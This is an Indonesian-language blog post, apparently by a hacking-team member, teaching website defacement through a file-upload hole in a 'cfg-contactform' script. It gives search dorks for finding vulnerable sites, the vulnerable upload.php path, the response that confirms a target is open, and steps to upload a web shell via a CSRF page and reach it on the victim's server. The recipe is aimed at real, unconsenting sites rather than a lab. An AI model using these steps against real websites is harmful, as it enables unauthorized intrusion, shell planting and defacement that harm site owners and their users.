Deface Web dengan Teknik CFG-Contact Form Vulnerability File Upload

Hallo, Lama tidak Post Artikel Terbaru

kali ini saya mau share tutorial mengenai salah satu teknik deface yang di buat oleh  member dari team Indonesian Cyber Freedom. Oke Langsung aja .

#Author : People_hurt a.k.a Peterpan | Incef Team

#Dork: "/cfg-contactform-1/"
           "/cfg-contactform-2/"
#Kembang kan dork dengan otak bokepers kalian :3

Cari target dengan dork diatas


Pilih salah satu target dan masukan Exploit dibawah ini

# Exploit tergantung contact form yang keberapa agan pilih
/[path]/cfg-contactform-1/inc/upload.php


Kalau ada mantra ajaib blablabla {"filename":"blabla"} itu berarti vuln
lalu upload shell dengan CSRF

# Upload Shell dengan CSRF

CSRF : Touch Me :)
Copy dan simpan dengan script diatas dengan nama peler.html
ganti yang warna merah itu jadi target agan, beserta path upload nya.

#Acces Shell : www.target.co.li/[path]/cfg-contactform-1/upload/namashell.php

Sekian
Thanks to :

0 Response to "Deface Web dengan Teknik CFG-Contact Form Vulnerability File Upload"

Post a Comment